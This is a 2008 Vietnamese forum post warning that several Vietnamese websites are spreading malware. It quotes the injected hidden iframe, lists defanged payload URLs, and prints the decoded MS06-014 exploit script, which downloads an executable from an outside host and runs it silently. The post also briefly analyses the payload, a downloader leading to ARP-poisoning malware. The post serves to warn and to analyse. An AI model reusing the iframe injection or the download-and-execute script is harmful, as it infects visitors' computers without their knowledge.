Hot news!!!!
Theo thông tin tui nhận và kiểm tra được: khi vào web của thế giới hoàn mỹ thì bị nhiễm virus.
Tiếp theo bằng google mình còn phát hiện ra các website sau cũng đang có dấu hiệu nhiễm virus:
thegioihoanmy.vn
cf.vtc.vn
vtc.vn
....
Link:
http://www.hvaonline.net/hvaonline/posts/list/21611.hvahttp://www.thegioihoanmy.vn/diendan/...t=61548&page=7Sau khi xem xét thì FD phát hiện ra cái này trên trang của thegioihoanmy
- Trích dẫn :
iframe width=1 height=1 src=http://cc.haowangma.com/one/hao888.htm?042
Con này hôm trước anh em cũng đã xem xét qua. Thực chất nó gồm 4 con:
- Trích dẫn :
hxxp://dd.buhaoyishi.com/mmuu/abd.cab
hxxp://dd.buhaoyishi.com/mmuu/arl.exe
hxxp://dd.buhaoyishi.com/mmuu/a014.exe
hxxp://dd.buhaoyishi.com/mmuu/abf.exe
hxxp://dd.buhaoyishi.com/mmuu/alz.exe
Mình tập trung vào con:
- Trích dẫn :
- hxxp://dd.buhaoyishi.com/mmuu/a014.exe
(Khai thác lỗi MS06-014. Ai chưa biết thì google)
Vì mấy con trên khai thác vào lỗi của baidu search (không được dùng ở VN).
Code exploit đã được giải mã.
- Trích dẫn :
var url="http://dd.buhaoyishi.com/mmuu/a014.exe";try{v ar xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.O pen("GET",url,0);xml.Send();as.type=1;as.open();as .write(xml.ResponseBody);path="..\\ntuser.com";as. savetofile(path,2);as.close();var shell=ado.createobject("Shell.Application","");she ll.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}
FD có đem về phân tích. a014 là 1 downloader bình thương, pack bằng WinUpack còn 1.92 Kb .
Virus chính có tính năng ARP Poisoning, giả gateway. Cũng may không có rootkit.
=>Khẳng định rất có thể có một máy nào đó trong hệ thống máy chủ trên VDC bị nhiễm virus này => tất cả các máy khác trong cùng mạng đều chịu ảnh hưởng.
Điều này hoàn toàn trùng khớp vì các website bị phản ảnh là có virus ở trên đều cùng đặt trên VDC, cùng giải IP: 203.162.1.x
Không hiểu mấy ổng thiết kế mạng kiểu gì nữa, vừa xem qua thấy toàn site lớn không àh!!! Thiệt nguy hiểm....
16/9/2008, 7:28 am